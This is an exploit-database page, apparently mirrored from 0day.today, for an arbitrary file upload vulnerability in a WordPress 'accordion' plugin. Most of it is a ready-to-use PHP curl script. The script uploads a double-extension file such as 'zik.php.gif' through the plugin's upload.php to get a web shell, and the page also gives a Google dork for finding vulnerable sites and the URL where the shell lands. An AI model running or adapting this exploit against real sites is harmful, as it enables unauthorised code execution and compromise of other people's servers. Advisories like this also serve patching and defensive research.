Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtZikou-161337DAY-ID-20254
HistoryJan 30, 2013 - 12:00 a.m.

Wordpress plugins accordion Arbitrary File Upload Vulnerability

2013-01-3000:00:00
Zikou-16
0day.today
68
JSON

The attacker can uplaod file/shell.php.gif

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Zikou-16 member from Inj3ct0r Team                 1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
 
-----------------------------------------------------------------------
Wordpress plugins - accordion Arbitrary File Upload Vulnerability
-----------------------------------------------------------------------
 
#####
# Author => Zikou-16
# E-mail => [email protected]
# Facebook => http://fb.me/Zikou.se
# Google Dork => inurl:"/wp-content/plugins/accordion/"
# Tested on : Windows 7 , Backtrack 5r3
# Download plugin : http://xmlswf.com/images/stories/WP_plugins/accordion.zip
####

#=> Exploit Info :
------------------
# The attacker can uplaod file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ [email protected]#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------
 

#=> Exploit 
-----------
<?php
 
$uploadfile="zik.php.gif";
$ch = curl_init("http://[target]/[path]/wp-content/plugins/accordion/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/accordion/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
 
print "$postResult";
?> 

Shell Access : http://[target]/[path]/wp-content/uploads/accordion/random_name.php.gif
 
<?php
phpinfo();
?>
 
------------------------------
 
Greet'z To #=> KedAns-Dz - JIGsaw - Elite Trojan - Anonymous Algeria - DZMafia & All Inj3ct0r Member  <= Th3 End ^_^

#  0day.today [2018-04-02]  #
JSON